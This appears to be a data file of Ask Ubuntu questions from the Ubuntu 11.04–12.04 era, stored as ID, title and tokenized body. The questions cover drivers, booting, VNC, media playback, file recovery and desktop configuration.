thermistor cpu0_vid : +1.219 v
94334	how can i install the social-engineering toolkit ( set ) ?	there is this software ( set ) from backtack 5 source that i found out about . but i do n't know how to install this thing . could somebody help me ? here the link : http : //www.secmaniac.com/download/
94335	how to recover .ecryptfs directory , and other contents of home directory	i am encountering this error install problem : configuration files for gnome power manager have not been installed correctly i went to recovery console and mistakenly deleted .ecryptfs /home # rm -r .ecryptfs/ when i reboot , i could log in but see a blank desktop . all of my user settings are gone , also /home directory is empty ( save the directory `` unmesh '' ( the user name ) ) at this point i came to know about the encryption file system and all . how can i recover my desktop items and other user data without updating to 11.04 ?
94338	how can i change what details the thunderbird email notification pop-up displays ?	at the moment when i get a pop-up notification that i 've received an email it is is the format : -my email address -received 1 new message -subject line of email -1st line of email how can i change this so that it also displays the email address/name of whoever sent me that email ? i 'm using ubuntu 11.10 with unity thanks for any help , i 've gone through so many settings menu but have drawn a blank !
94340	parse network configuration file ( /etc/network/interfaces ) with python	i need to write script in python to read/write /etc/network/interfaces file . it is not parse-able with builtin module configparser because there are no sections . is there any parser for such files ? or maybe python module to manage network configuration ? or maybe there are other ways to read/change network interfaces settings ? !
94345	how can i connect to gnunet 0.8.1 on 11.10 ?	as the sopa/pipa storm was brewing , i thought i should give some of the new tools people were talking about a try . after reading around and checking what was available in the repos , i picked gnunet . i want to be able to download linux isos on p2p without anyone being able to tell if i have defected to sabayon : ) ( you should n't use bittorrent over tor . it 's too heavy for that network , and your ip address gets revealed at the end point . ) i have installed gnunet secured p2p 0.8.1 ( package name gnunet-gtk ) and gnunet-server . i ran the configuration wizard , picking my network interface and all the default options . i got a prompt saying unable to change startup process : success . i ran it again and this time also ticked `` start the gnunet background process '' . it then completed with no prompt . ( my network interface defaults to lo rather than wlan0 each time . i leave ip/hostname blank because i have a dynamic ip address - should i enter computername.local ? ) i ran the advanced configuration tool , and changed the hostlists from http : //gnunet.org/hostlist.php http : //gnunet.mine.nu:8081/hostlist http : //vserver1236.vserver-on.de/hostlist-074 http : //mosquito.dyndns.tv/gnunet-hostlist/hostlist http : //de.gnunet.org/hostli to http : //mosquito.dyndns.tv/gnunet-hostlist/hostlist http : //de.gnunet.org/hostlist-080 http : //vserver1236.vserver-on.de/hostlist-074 . ( per https : //gnunet.org/node/1190 and http : //lists.gnu.org/archive/html/help-gnunet/2010-10/msg00000.html ) when the gnunet gui starts the message bar reads `` daemon running '' . after a while it reads `` disconnected '' . what do i need to do to connect ?
94346	the nice sliding , multilayer ubuntu webpage	probably my question may seem frivolous , but it 's important for me . can somebody recognize the webpage that is described below ? a very nice ubuntu webpage appeared few months ago . it was a one big slidable page with multiple sections and layers . as i was scrolling down the backgrounds were changing and some other pictures were sliding too ( as they were floating ) but slower than the background slid . i 've made a lot of google search but they 've been futile . so i am looking for this webpage and i hope somebody could recognize it by my description .
94347	ubuntu only detects 3.1 gb of ram on ubuntu 64 bit	i am using ubuntu linux 64 bit . recently , i was using ubuntu 32 bit , and discovered through the command grep -- color=always -iw lm /proc/cpuinfo that my processor is capable of 64-bit . the output of the command is : flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc up pebs bts nopl pni dtes64 monitor ds_cpl tm2 cid cx16 xtpr however , after wiping the disk and install ubuntu 11.10 64 bit , the system still detects only 3.1 gb of ram . i have verified in the bios that i have 4 gigabytes of ram installed , not 3.1 . why is ubuntu 64 bit only detecting 3.1 gb of ram ? output of uname -a aaron @ aarons-ubuntu-computer : ~ $ uname -a linux aarons-ubuntu-computer 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux output of free -m aaron @ aarons-ubuntu-computer : ~ $ free -m total used free shared buffers cached mem : 3136 2960 175 0 233 1996 -/+ buffers/cache : 730 2405 swap : 3189 0 3189
94348	will i be able to install ubuntu tv as a shell ?	so how is ubuntu tv going to be used ? i guess it wo n't be just an application since it will be used as an entire shell on the tv . it would be really awesome if it really is a shell so that i can choose it on log in from a list of other desktop environments ! that way you can build a custom htpc with ubuntu tv if you wanted to ! so my question is , will ubuntu tv be a desktop environment ?
94351	vpnc can not connect to vpn due to vpnc-script	i am trying to connect establish vpn connection with vpnc but it failed with message error : either `` to '' is duplicate , or `` ipid '' is a garbage according to http : //blog.nowherelan.com/2011/10/10/vpnc-on-ubuntu-oneiric-error-either-to-is-duplicate-or-ipid-is-a-garbage/ i replaced vpnc-script but got a new error message : /etc/vpnc/vpnc-script : 658 : syntax error : end of file unexpected ( expecting `` ; ; '' ) after that it starts vpnc-connect `` in background '' but no ip address is assigned : ifonfig -a : tun0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 pointopoint noarp multicast mtu:1500 metric:1 rx packets:3 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:531 ( 531.0 b ) tx bytes:0 ( 0.0 b ) uname -a : linux mobile 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:28:43 utc 2011 x86_64 x86_64 x86_64 gnu/linux ideas ? finally i got working version of vpnc-script here http : //git.infradead.org/users/dwmw2/vpnc-scripts.git/blob_plain/4deaaf9a32 : /vpnc-script
94355	how can i move the exit , maximize , minimize buttons to the left in kubuntu ?	i want to move exit , maximize , and minimize button to the left like i can do in ubuntu 11.10 . how to do it ?
94357	how to get my laptop to detect sd cards inserted into its built-in card reader ?	my laptop has a built-in sd card reader but it can not detect one when inserted . here is the result when i type lspci from the terminal : 00:00.0 host bridge : ati technologies inc rs480 host bridge ( rev 10 ) 00:01.0 pci bridge : ati technologies inc rs480 pci bridge 00:06.0 pci bridge : ati technologies inc rs480 pci bridge 00:07.0 pci bridge : ati technologies inc rs480 pci bridge 00:12.0 ide interface : ati technologies inc ixp sb400 serial ata controller ( rev 80 ) 00:13.0 usb controller : ati technologies inc ixp sb400 usb host controller ( rev 80 ) 00:13.1 usb controller : ati technologies inc ixp sb400 usb host controller ( rev 80 ) 00:13.2 usb controller : ati technologies inc ixp sb400 usb2 host controller ( rev 80 ) 00:14.0 smbus : ati technologies inc ixp sb400 smbus controller ( rev 83 ) 00:14.1 ide interface : ati technologies inc ixp sb400 ide controller ( rev 80 ) 00:14.2 audio device : ati technologies inc ixp sb4x0 high definition audio controller ( rev 01 ) 00:14.3 isa bridge : ati technologies inc ixp sb400 pci-isa bridge ( rev 80 ) 00:14.4 pci bridge : ati technologies inc ixp sb400 pci-pci bridge ( rev 80 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : ati technologies inc rs482 [ radeon xpress 200m ] 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 01 ) 05:04.0 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 05:04.2 sd host controller : o2 micro , inc . integrated mmc/sd controller ( rev 01 ) 05:04.3 mass storage controller : o2 micro , inc . integrated ms/xd controller ( rev 01 ) 05:09.0 network controller : ralink corp. rt2561/rt61 rev b 802.11g
94360	ubuntu one intermittent sync	i have found that ubuntu one sometimes will sync a local file to the ubuntu one website , and other times it will not . how can i debug this ? i 'm sitting at my machine making edits and saving several files , all of which are in folders that are to be ubuntu-one sync 'd . when i look at the website ( even much later , say , the next day ) only some of the files were sync 'd . any ideas ? edit 1 : i 'll add this : i only see this problem with folders other than the ubuntu one folder . the ubuntu one folder seems to always stay in sync .
94363	targeta grafica intel 8286g	i need help knowing how to install and where to download my video card in it , intel 82865g 11.10 ubuntu utilis grapics my pc is a dell optiplex gx270 ayuda necesito saber como instalar y de donde descargar mi tarjeta grafica en es ; intel 82865g grapics utiliso ubuntu 11.10 mi pc es una dell optiplex gx270
94368	how to change log in screen resolution to 1024*768 in lubuntu 11.10 ?	i am new to lubuntu or any ubuntu os . please in detail answer will be appreciated .
94369	is there a way to disable auto-switch output channel when i connect headphones ?	it kicked in after upgrade to ubuntu 11.10 when i connect headphones , output channel ( observed through control panel sound section ) switches to headphones and volume level in headphones is extremely low workarounds : set output channel back to speakers . volume level in headphones pops in to normal switch profile in hardware section to some other and then back raise speaker volume in alsamixer currently i am in a hurry and not looking for proper fix . is there a way to disable auto-switch output channel when i connect headphones ? ps . strange thing : when i run alsamixer -c 0 , there is no bar above headphones section , just |00| , like they are not connected , therefore i can not rise volume level manually
94372	grub2 displays only flashing cursor	i have a 11.10 system was running 11.04 without any problems , which i upgraded to 11.10 . i noticed that there were many extra kernels that it was n't using , so i removed all of them other than the 3.0.0.14 that it was using . since then the system will not boot . it stops just after starting grub with a flashing cursor . if i hold down shift , then it also displays `` loading grub '' and then hangs . i have attempted all the grub repair procedures using update-grub , grub-install from the live cd and the parted magic cd , and using the boot-repair utility , etc ... last night , i even completely reinstalled 11.10 from cd with a full repartition of my boot disk . same hang . i 'm at my wits end and do n't know what to do . i can think of only two more things to try : use 'fdisk ' to see if the drive is bootable , or buy another system . advice ? thank you , randy stegbauer
94373	how to make ubuntu use the entire partition ?	i have a partition for windows ( sda2 ) and one for ubuntu ( sda3 ) . i 've installed ubuntu from windows with the windows ubuntu installer ( wubi ) and set an installation size of 13gb ( i guess ) . everything works fine , but i 'm running out of disk space , even though there should be enough left . here 's what gparted says : and this is what ubuntu tells me ( and actually believes ) : so it seems that ubuntu only uses the space defined as the installation size in wubi . why is that ( since i assumed that `` installation size '' just affected the amount of packages and extra stuff installed ) and how can i make ubuntu use the entire partition ?
94378	imagemenuitem icons in python appindicator	i tried to create an appindicator using gtk.imagemenuitems . normally imagemenuitems display the stock 's item , but using python appindicator no icons in the menu are displayed at all . is this a lacking feature ? here is my example code . of course the indicator displays an icon but non of the menu entries : exit_item = gtk.imagemenuitem ( stock_id=gtk.stock_quit ) exit_item.connect ( `` activate '' , quit , none ) exit_item.show ( )
94385	an new monitor cable messed up my resolution	i was having trouble with the old vga cable i was using for my monitor . so i got a new one off of amazon real cheap , it says it 's high res hd15 on the posting i got it from . however when i boot into kubuntu or ubuntu , the resolution is wayyyyyyy too low and the proper one is not appearing in the settings . also , the grub menu is a different color ( dark blue vs. light blue ) and the resolution is smaller . the proper resolution is displayed in windows . is there any way to fix this ? do i have to buy a new cable ?
94395	hide shortcuts in dash home on unity	in unity 2d you can hide the shortcuts section of the dash home however in unity i can not hide this.. i do see a 'minimize ' icon in the top corner after i open dash home clicking on shortcuts does nothing . i do notice clicking on the minimize icon repeatedly does make it appear darker ( the white is whiter : p ) however the button does not serve a function . click once click twice click three times keep going and it gets a bit whiter is this button supposed to control this action ? or is this a separate bug ? update : i realize the minimize button does not control this action , with that said . is there a way to hide the 'shortcuts ' section of the dash home and just display the 'search ' ( +results once a search term is entered ) ?
94400	how do i help ubuntu becoming less crappy ?	i have used ubuntu for several years now , and it was a very stable and nice system . however , it became really crappy since a few releases , and it 's almost impossible for me to work with ubuntu 11.10 . of course , i could switch to another distribution etc. , but i want to help my favourite distribution to get less crappy . i have commented / reported several bugs and tried to help when i can , but the most bugs are just ignored by the maintainers so i have no hope that these really annoying issues will be fixed . do you know other ways how i can help ubuntu to become useable again ? ( of course i know that it works fine for many people , but that does n't help me when i need tv-out on a separate x screen [ which worked the releases before ] and the many other things that do n't work anymore . )
94405	what happens after someone receives ubuntu membership ?	what happens after someone receive ubuntu membership ? how s/he receives the benefits listed here ? i knew it 's documented somewhere on the wiki but so far could n't find any trace of it . thanks
94408	can i boot off of a .vdi file ?	i am using windows 7 as a host & have ubuntu vdi file . which i created using virtual box & installed the ubuntu os in ubuntu.vdi file . now i want to boot ubuntu directly on my hardware . that is at booting time of my pc i could see an option to boot win 7 & ubuntu . just want to boot ubuntu.vdi as real machine . please help me out .
94409	how do i un-install ubuntu tv	before i jump into the deep end of the pool and install this wonderful looking media app . my concerns are it 's stability and my ability to revert my system back to it 's pre-ubuntutv state . are there any detailed 'un-install ' instructions ? or is my best bet to just do a complete backup and restore if anything goes amuk ?
94419	removed hdd - ubuntu still looks for it at boot	i removed a drive ( sdc1 ) from my ubuntu pc and would like to find out how to stop the os trying to access it during boot up .
94420	how do i improve performance on an ati radeon 9550 ?	i 'm using the latest version of ubuntu ( 32-bit ) and i did n't find a solution to make my video card work fine . i mean that my graphic card has poor performance on watching videos . i 've tried a lot of tutorials but with no succes . also some codecs , plugins could help me .
94421	is there a way to recover files from a storage device partially overwritten with dd ?	i 'm an idiot , i was writing an image to a usb drive using dd when instead of typing /dev/sdb i typed /dev/sdd and wrote the 135mb image to my 750gb external hardrive full of files . is there any possibility of recovering the files or did dd completely zero out the drive ? please help , as this is one of the lowest points of my life ever . dd finished writing the 135mb image in 5 seconds , so i did n't have a chance to stop it . by the time i knew what happened to was too late . the command was as follows : sudo dd if=generic.img of=/dev/sdd bs=1m edit2 : the external harddrive 's filesystem was fat32 ( i 've had the drive for awhile and fat32 was the most universal fs at the time ) . i also have a 2tb drive i just got which i was planning on moving most of the files to from the 750gb , if needed i can use it to transfer the recovered files to .
94422	choppy video playback 11.10	i just installed 11.10 and i also installed the ati prop . driver . whenever i try to play a mkv file in mplayer , smplayer , or vlc , it is choppy . and in the case of vlc the audio is messed up also . any way to fix this ?
94423	is there a way to stop chrome/firefox record history of a 'particular ' website ?	i want chrome/firefox not to record history of a 'particular ' website . is it possible to do so ? i searched in preferences , but could n't find a solution .
94427	partially dist-upgrade from cli ?	sometimes a sudo aptitude upgrade fails and sudo aptitude upgrade -- full-resolver then wants to remove about 100 packages , because of `` dependecy conflicts '' . often i can then start update-manager and it offers me a `` teilweise systemaktualisierung '' ( roughly `` partially distribution upgrade '' ) , when i run this then all packages are updated and it does this without removing any packages in most cases . since i want to avoid using graphical tools for this kind of stuff , my question is : is there a way to start the `` partially dist-upgrade '' via command line ? prefferably with aptitude ?
94430	which ubuntu is oriented to programming and robotics ? server , desktop or other distro ?	well , rather than a question is an opinion from you , it goes well , what version of ubuntu is better oriented programming to robotics or anything related to programming languages ââ ( like c , perl , c + + , java , etc.. ? ) i have read on other forums that say ubuntu ( desktop ) is unstable , eye i mean when you start playing the system configuration files and goes crazy . also not sure if ubuntu server is most convenient for programming , robotics and stuff or if other distros are better for it as mint , fedora , suse , or debian arch , and then based on their experience and knowledge i would like to give their opinions regarding this . greetings ( :
94432	gtk applications in kubuntu 11.10	i check gtk+ in kubuntu apps look bad and configure all by recommendations but oxygen-gtk theme does not affect the appearance
94433	how to revert back to openjdk ?	i had installed sun-java , but i want to revert back to openjdk 7 . i was trying to re-install from the terminal using the command sudo apt-get install openjdk-7-jre , same from synaptic and software center , but it does not work . i try to use the command java -version and then i get a message like the java program can be found on follow packagesâť open-7-jre-headless so , i tried to install it , but they are installed on my system ... i do no want format my pc just for java . thanks .
94437	does removing extra workspaces in unity2d impact cpu or ram performance ?	i never used workspaces , so i have set number of workspaces to 1 . after restarting , unity seems to be kinda snappier . what`s in theory ?
94439	can i create a separate bash history file for each terminal profile ?	i use a bash script to start gnome-terminal with multiple tabs , each tab using a different profile , working directory , and in some cases executing a command within the tab . in this situation , i 'd like for the up arrow key to retrieve commands that were used in a specific tab . is this possible ?
94442	how to enable wobbly windows in the xfce desktop ubuntu 11.10	question pretty much says it all . im running the latest version of xfce desktop . i have compiz manager installed and i had wobbly windows working on unity . is there any way to have this effect on xfce ?
94443	how to get intel 82845 graphic drivers for ubuntu ?	when i had xp , after installing it , i used to run the setup.exe file for graphic driver . this used to greatly improve graphic quality , like good looking small icons , cleaner videos , and so on . now , for ubuntu too , there must be a similar graphic driver , maybe provided by intel , ( a counterpart of `` setup.exe '' for ubuntu ) , which would improve graphic quality just like in windows . trouble was i could never find one . need help . btw in xp i needed sound driver too , to enable sound . i do n't need anything for ubuntu .
94452	which cpu will work best with ubuntu ?	i 'm choosing between two laptops with an amd a6-3400 and intel core i3 sandy bridge . i want to know which cpu is better with ubuntu as in performance ? using laptop for browsing and programming .
94453	display port not working for dell xps 14z	i am trying to hook up an external monitor to an xps 14z on ubuntu 11.10 . i realize it has an optimus card , but everything i can find says that the displayport is hooked up to the intel card , and hdmi is hooked up to the geforce , and nobody seems to be having any problems with it , even on a 15z which ( i would imagine ) would be similar hardware . anyone have any ideas ?
94454	why does ubuntu install incompatible versions of seamonkey ?	seamonkey ( netscape ) 2.0.13 does not work with ubuntu . ubuntu keeps installing it . the system wo n't allow 2.0.14 . version 2.1 has been installable but are no longer netscape nor are file compatible . manual installs fail . 2.0.8 , 11 , 14 are good . 2.0.13 or 2.1 & later are either incompatible with the system or files . what does it take to make the last true version of netscape ( seamonkey 2.0.14 ) available ?
94456	set screen resolution when booting with no screen	i want to remote connect to my ubuntu 11.10 via vnc . i am booting with out any screen , and therefore i ca n't set the screen resolution to anything but 640x480 . when i then connect through vnc i ca n't get a larger view than 640x480 . have you got any idea how to change the resolution even with no screen connected ? edit : i am using x11vnc on my ubuntu machine , and connecting with tightvnc from my windows 7 machine . if you have any better sugestions , you are very welcome . i 've tried to use the built in remote desktop application , but i could n't get that working .
94457	how can i run xbmc as another user ?	it 's a little bit complicated as other `` how can i run '' questions , firstly , because i use this script to run on second screen ( tv ) full size : 1 # ! /bin/bash 2 # launch xbmc in windowed mode , then use wmctrl to remove the titlebar 3 4 # select display 1 5 # separate x screennél 0.1 kell 6 # twinviewnél meg egy monitor van , azaz 0.0 7 display=:0.0 8 9 # start xbmc without blocking this script 10 xbmc & 11 12 # wait for the xbmc window to appear 13 status=0 14 while [ $ status -eq 0 ] 15 do 16 sleep 1 17 status=`wmctrl -x -l | grep `` xbmc media center '' | wc -l | awk ' { print $ 1 } '` 18 done 19 20 # force xbmc window to fullscreen 21 # export sdl_video_fullscreen_display=1 22 wmctrl -x -t 0 -r xbmc media center.xbmc media center -b toggle , fullscreen and second , because xbmc want to connect to the other user 's screen . i do n't know anything about x sessions or how the screen permissions working . is it possible at all ? so how can i achieve that `` kati '' user could run this script as `` walkman '' user fully , but not anything else ?
94462	why display variable constantly changing , and how can i determine what 's the right value ?	i use this script to launch xbmc : # ! /bin/bash # launch xbmc in windowed mode , then use wmctrl to remove the titlebar display=:0.0 # start xbmc without blocking this script xbmc & # wait for the xbmc window to appear status=0 while [ $ status -eq 0 ] do sleep 1 status=`wmctrl -x -l | grep `` xbmc media center '' | wc -l | awk ' { print $ 1 } '` done # force xbmc window to fullscreen # export sdl_video_fullscreen_display=1 wmctrl -x -t 0 -r xbmc media center.xbmc media center -b toggle , fullscreen but the display variable always changing ... why ? ( i never change any configuration options ) sometimes it 's 0.1 , sometimes it 's 0.0 . how should i modify the script to run whatever the value is , or what 's a better solution ?
94463	how i can run zeitgeist with kde	i ca n't integrate zeitgeist with kde , when i use gnome , zeitgeist works correct and logs everything what i 'm doing . is it a problem that i 'm using both graphical environments ? ( i 'm going to remove gnome ) maybe when i install krono , then all will be works fine ? - > how to install it ?
94467	retrieving file via ubuntu one api brings back webpage	i 'm playing around with the ubuntu one api ( coding in java ) and can successfully make calls using : get /api/file_storage/v1 and get /api/file_storage/v1/~/path/to/volume/path/to/node to get information about the directory structure and files . when i make a get request for : https : //files.one.ubuntu.com/yglpi504etc.etc.etc . i get a webpage back ( works in a browser obviously , but not in my code ) : < html > < head > < title > openid transaction in progress < /title > < /head > < body onload= '' document.forms [ 0 ] .submit ( ) ; '' > < form id= '' openid_message '' action= '' https : //login.launchpad.net/+openid '' method= '' post '' accept-charset= '' utf-8 '' enctype= '' application/x-www-form-urlencoded '' > < input type= '' hidden '' name= '' openid.return_to '' value= '' https : //files.one.ubuntu.com/auth/complete/ ? next= % 2fyglpi504si6eombttqurww % 2f & amp ; janrain_nonce=2012-01-10t23 % 3a20 % 3a10zjm6ttj '' / > < input type= '' hidden '' name= '' openid.realm '' value= '' https : //files.one.ubuntu.com/ '' / > < input type= '' hidden '' name= '' openid.ns '' value= '' http : //specs.openid.net/auth/2.0 '' / > < input type= '' hidden '' name= '' openid.sreg.optional '' value= '' email , fullname , nickname '' / > < input type= '' hidden '' name= '' openid.claimed_id '' value= '' http : //specs.openid.net/auth/2.0/identifier_select '' / > < input type= '' hidden '' name= '' openid.ns.sreg '' value= '' http : //openid.net/extensions/sreg/1.1 '' / > < input type= '' hidden '' name= '' openid.assoc_handle '' value= '' { hmac-sha1 } { 4efc9f73 } { e6wedg== } '' / > < input type= '' hidden '' name= '' openid.mode '' value= '' checkid_setup '' / > < input type= '' hidden '' name= '' openid.identity '' value= '' http : //specs.openid.net/auth/2.0/identifier_select '' / > < input type= '' submit '' value= '' continue '' / > < /form > < script > var elements = document.forms [ 0 ] .elements ; for ( var i = 0 ; i < elements.length ; i++ ) { elements [ i ] .style.display = `` none '' ; } < /script > < /body > < /html > is this the wrong url to be using in code ?
94470	mailing list software with easy to use gui	i 'm looking for an easy to use making list program so , i can use my existing email to send to all the people on my list . i want to have it so i can send it with out them seeing each others email addresses and so i can have there names in the email , like a personalize emails you get when you sign up for stuff . also i would like for it to have a gui .
94472	blank screen after start	i just recently installed ubuntu 11.10 from a cd , it all worked out well and all . but whenever i start ubuntu , after display the loading screen with the 5 dots , it turns black and i needed to reboot it . i 'm pretty new to this , but any advice ? i have a toshiba c655-s5049 dual-booting ubuntu and windows 7 with an intel gma 4500m graphics card . i think i have to edit the command line , but i 'm not sure how or if i 'm right .
94474	installed ubuntu on a separate hdd , got a grub error and want to know if anything went wrong	i installed ubuntu on my spare hdd and everything was going fine until the setup installed grub . i have 3 hdds in raid0 and a spare hdd where i chose for ubuntu . the error said that grub can not be installed on drive named `` sda '' , therefore i picked `` sdd '' from the list , which was the hdd with ubuntu on it . as i went through the list of drives , i noticed a few volumes with `` mapper '' in their name , which i assumes is the raid0 . afterwards , even though it was installed on a separate drive , i had to use the /fixmbr windows recovery to be able to boot into windows . my question is , why did it still affect windows if it was installed on a separate drive ? when it was trying to install on `` sda '' , does that mean it might have corrupted my windows partition and data ?
94477	setting up vnc via putty ubuntu 10.4.2 lts	i have just setup my server with ubuntu desktop , after running the sudo apt-get install-desktop , and rebooting i now want to login to the dektop remotely , from my windows pc . how do i enable remote vnc / teamviewer access via the ssh command line ?
94478	1080p choppy on two different gpus , what else could it be ?	i 'm building a htpc with this asrock e350m1/usb3 motherboard . the onboard ati radeon hd 6310 graphics had a hard time swallowing a 1080p x264 mkv ( ~10 gb ) so i popped in a discrete nvidia gt 240 ( 1024mb ) . oddly enough , that also would n't play it properly . both cards had the associated vendor drivers installed and active , i have tried x264 and raw blu-ray to no avail . i know the gt 240 is capable of playing 1080p movies , so what is the hangup ? choppy refers to getting about one frame every few seconds , but i also see this from time to time : http : //ptpimg.me/8yt8ev.png output from running vlc from the command line on a untouched blu-ray ( m2ts ) rip . me @ gamma ~ $ vlc vlc media player 1.1.9 the luggage ( revision exported ) blocked : call to unsetenv ( `` dbus_activation_address '' ) blocked : call to unsetenv ( `` dbus_activation_bus_type '' ) [ 0x8d41914 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . blocked : call to setlocale ( 6 , `` '' ) warning : call to srand ( 1326832540 ) warning : call to rand ( ) blocked : call to setlocale ( 6 , `` '' ) ( process:2617 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . warning : call to rand ( ) warning : call to rand ( ) warning : call to rand ( ) warning : call to rand ( ) libdvbpsi error ( psi decoder ) : ts discontinuity ( received 1 , expected 0 ) for pid 0 libdvbpsi error ( psi decoder ) : ts discontinuity ( received 1 , expected 0 ) for pid 0 libdvbpsi error ( psi decoder ) : ts discontinuity ( received 3 , expected 0 ) for pid 256 libdvbpsi error ( psi decoder ) : ts discontinuity ( received 3 , expected 0 ) for pid 256 [ 0x8ddc6e4 ] signals interface error : signal 17 overriden ( 0x3b114c0 ) [ 0x8ddc6e4 ] signals interface error : /usr/lib/libqtcore.so.4 ( ? ) [ ( nil ) ] [ 0x8ddc6e4 ] signals interface error : signal 17 overriden ( 0x3b114c0 ) [ 0x8ddc6e4 ] signals interface error : /usr/lib/libqtcore.so.4 ( ? ) [ ( nil ) ] output from vlc -vvv on the same file : here ok , so we got the gt 240 working by using vd-pau which is a magical thing that tells software like nplayer to use the gpu to do the work instead of the cpu . problem is that vd-pau is essentially nvidia only and the built in graphics are ati based . ( in ~/.mplayer/config ) vo=vdpau , xv vc=ffh264vdpau , ffmpeg12vdpau , ffwmv3vdpau , ffvc1vdpau i 've done some digging and it seems va-api and xvba are the ati equivalents . the question now is how do i get these to work in natty ( preferentially with something like xbmc ) so far , with just the onboard radeon hd 6310 graphics i 've done this : sudo apt-get install xvba-va-driver libva-glx1 vainfo mplayer -vo xv -framedrop -ao sdl /path/to/000000.m2ts and it is certainly getting close . still too many dropped frames to be considered watchable however .
94479	where are the gnome fallback configuration user files ?	i am trying to find the gnome panel layout file for the user . under the user 's folder i 'm not finding it under .gnome2 or .gconf or anything . i found the default xml file under /usr/share/gnome-panel/panel-default-layout.layout . any ideas ? i 'm using ubuntu 11.10 .
94483	what is the best way to keep two bzr repositories in sync ?	i would like to keep a bzr repository in sync between my laptop and desktop . is there any special tool to accomplish this , or should i just use rsync ? i would absolutely love it if i could get one that would automatically synchronize and let the newer version win .
94487	automatically mounted ntfs ( not in /etc/fstab ) wo n't chmod	i have an ntfs partition so i can share with a dual-booted windows installation . chmod does n't do anything , nor issue a warning to indicate this . i want other ( ubuntu ) users to have rw permissions on certain files . brian @ brian-t1 : /media/storage/documents/scratch projects $ ls -l -rw -- -- -- - 1 brian brian 5 2012-01-11 02:18 testfile brian @ brian-t1 : /media/storage/documents/scratch projects $ chmod go+rw testfile brian @ brian-t1 : /media/storage/documents/scratch projects $ ls -l -rw -- -- -- - 1 brian brian 5 2012-01-11 02:18 testfile what is wrong here ?
94488	how to recompile dwm ?	i am about to run sudo apt-get install dwm on ubuntu 12.04 . when i was on arch linux dwm was installed to a folder and recompiled in the folder when you made changes to it . ( edit settings ) . i am sure you understand how important it is to be able to recompile the files as its the only way to make changes to dwm as far as i know . where exactly is the folder with the files installed to ? figure i should find this out before installing dwm blindly !
94490	what is the api for new lens features in the ubuntu tv alpha ?	as of the ubuntu 12.04 alpha , lenses are simply lists of results pushed onto a dbus domain like net.launchpad.lens.mylens . this makes lenses and scopes more or less equivalent to search engines . however , lenses as seen in the ces ubuntu tv demo seem to provide a visual formatting language for sets of data and operations . is there an api for using these awesome new lens types ? will it be available in mainline ubuntu in the near future ?
94491	vlc stops playing at 3:30am	i have ubuntu 10.04 and vlc 1.1.12 luggage . and my problem is that i am listening internet radio for example from sky.fm vlc stops playing at 3:30am and after vlc starts playing after 2 hours maybe . do you know what is problem ? help me please . thank you . i have asus a6jc
94492	remove network settings indicator/app on ubuntu 11.10	on my laptop ( hp envy 14 , core i5 with intel 6200n wifi ) the built in network manager/network settings applet or indicator or whatever is completely useless and just fails to connect to anything . i found a suggestion here to try using wicd instead , and it does work for me . i 'd like to remove the default indicator if it 's going to keep causing problems but it looks like i do n't have network-manager or network-manager-gnome installed . how can i remove it ? ( as a side note , is it possible that it was n't working because network-manager was n't installed ? but it shows up and sometimes shows networks , it just fails to connect to them , and when i click anything in the settings it just turns off the wifi device altogether ) .
94499	how do i install ultrastar deluxe ?	i 'd like to install ultrastar deluxe in ubuntu 11.10 . on the project homepage and in this ppa there are some packages , but they seem to be for an older release of ubuntu , because when i try to install them , i get complaints about missing dependencies ( packages that are no longer available in the 11.10 repositories ) : ... dpkg : dependency problems prevent configuration of ultrastar-deluxe : ultrastar-deluxe depends on libavcodec52 ( > = 4:0.6-1~ ) | libavcodec-extra-52 ( > = 4:0.6-1~ ) ; however : package libavcodec52 is not installed . package libavcodec-extra-52 is not installed . ultrastar-deluxe depends on libavformat52 ( > = 4:0.6-1~ ) | libavformat-extra-52 ( > = 4:0.6-1~ ) ; however : package libavformat52 is not installed . package libavformat-extra-52 is not installed . ultrastar-deluxe depends on libavutil50 ( > = 4:0.6-1~ ) | libavutil-extra-50 ( > = 4:0.6-1~ ) ; however : package libavutil50 is not installed . package libavutil-extra-50 is not installed . ultrastar-deluxe depends on libprojectm2 ; however : package libprojectm2 is not installed . ultrastar-deluxe depends on libswscale0 ( > = 4:0.6-1~ ) | libswscale-extra-0 ( > = 4:0.6-1~ ) ; however : package libswscale0 is not installed . package libswscale-extra-0 is not installed . dpkg : error processing ultrastar-deluxe ( -- install ) : dependency problems - leaving unconfigured ... apart from compiling the program myself and/or repackaging the software , is there a way i can install ultrastar deluxe in ubuntu 11.10 ?
94502	first reboot after install and ubuntu 11.10 does n't start correctly	this is what i see : once it gets to this screen it hangs/does n't go anywhere . it 's a 64-bit installation , i 'm not sure what to do . i 've tried installing various ways but i always get the same results . what other information do you need ? amd hd radeon 6850 .
94503	how to swap/remap the caps lock key with tab key ?	i 've been trying to swap caps lock key with tab key . so the caps lock key should n't turn on the caps anymore , instead , act as the tab key . some people told me that i should create a .xmodmap file in the ~/ directory . but i have no idea what 's next . any suggestions ?
94504	how to subscribe to other user 's calendars ?	in all previous versions of evolution that i had ( up to the version included in ubuntu 10.04 ) , under file , there was an option to subscribe to other user 's resources . this allowed to subscribe to shared calendars on the ms exchange server . but i do n't see this option in evolution 2.32.2 included in ubuntu 11.04 . how can i subscribe to shared exchange resources ?
